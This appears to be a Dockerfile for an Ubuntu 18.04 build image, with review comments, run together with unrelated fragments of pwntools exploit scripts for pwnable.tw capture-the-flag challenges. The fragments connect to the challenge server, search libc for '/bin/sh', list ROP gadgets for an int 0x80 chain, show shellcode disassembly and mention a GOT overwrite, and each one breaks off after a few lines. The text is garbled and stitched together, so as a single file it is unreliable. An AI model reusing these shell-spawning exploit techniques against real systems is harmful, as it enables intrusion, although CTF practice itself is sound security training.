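# NOTE(review): ubuntu:18.04 is past its standard support window, so the image
# no longer receives regular security updates. The tag is kept because the
# package names below (libgcc-8-dev, python, ...) are tied to this release; if
# the base must stay, pin it by digest so rebuilds are reproducible.
FROM ubuntu:18.04

# Install dependencies.
# `&&` replaces the original `;` so the build stops when `apt-get update`
# fails, instead of installing from a stale or missing package index.
# Packages are unchanged from the original list, sorted one per line so that
# additions and removals are easy to review.
# NOTE(review): the apt lists are left in place because later steps of this
# file are not visible here; if nothing after this needs them, remove
# /var/lib/apt/lists/* in this same layer.
RUN apt-get -y update && \
    apt-get install -y --no-install-recommends \
        autoconf \
        automake \
        build-essential \
        ca-certificates \
        cmake \
        dirmngr \
        dpkg-dev \
        file \
        git \
        gnupg2 \
        lbzip2 \
        libc++-dev \
        libc-dev \
        libgcc-8-dev \
        libstdc++-8-dev \
        libtinfo5 \
        make \
        patch \
        python \
        python-dev \
        wget \
        xz-utils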
#TODO write a description for this script | |
#@author Chengbin, MyriaCore | |
#@category Functions | |
#@keybinding | |
#@menupath | |
#@toolbar | |
#TODO Add User Code Here |
from pwn import * | |
''' | |
Controlling ebp gives control of the stack, which makes it possible to modify the GOT entry for atoi.
The key to this challenge is, again, controlling ebp in order to modify atoi's GOT entry.
''' | |
def addDevice(device_num): | |
p.recvuntil('>') |
from pwn import * | |
silver_bullet = ELF('./silver_bullet') | |
libc = ELF('./libc_32.so.6') | |
#p = process('silver_bullet', env={'LD_PRELOAD' : './libc_32.so.6'}) | |
p = remote('chall.pwnable.tw', 10103) | |
p.recvuntil('Your choice :') | |
p.sendline('1') |
from pwn import * | |
#p = process('./hacknote', env={"LD_PRELOAD" : "./libc_32.so.6"}) | |
p = remote('chall.pwnable.tw', 10102) | |
libc = ELF('./libc_32.so.6') | |
binsh_addr = 0 | |
for address in libc.search('/bin/sh\x00'): | |
print("/bin/sh address is " + str(hex(address))) | |
binsh_addr = address |
from pwn import * | |
libc = ELF('./libc.so.6') | |
binsh_addr = 0 | |
for address in libc.search('/bin/sh\x00'): | |
print(address) | |
binsh_addr = address | |
break |
from pwn import * | |
from struct import pack | |
#/bin/sh/ = 0x6e69622f,0x0068732f | |
addr1 = 0x8070880 # int 80; ret | |
addr2 = 0x807cb7f # inc eax; ret | |
addr3 = 0x80908d0 # mov eax, 7;ret | |
addr4 = 0x80701aa # pop edx; ret | |
addr5 = 0x80701d1 # pop ecx; pop ebx; ret |
from pwn import * | |
''' | |
e: b8 05 00 00 00 mov $0x5,%eax | |
13: bb 9f a0 04 08 mov addr(shellcode+0x39),%ebx | |
18: b9 9a 02 00 00 mov $0x29a,%ecx | |
1d: ba 00 00 00 00 mov $0x0,%edx | |
22: cd 80 int $0x80 | |
24: 89 c3 mov %eax,%ebx | |
27: b8 03 00 00 00 mov $0x3,%eax |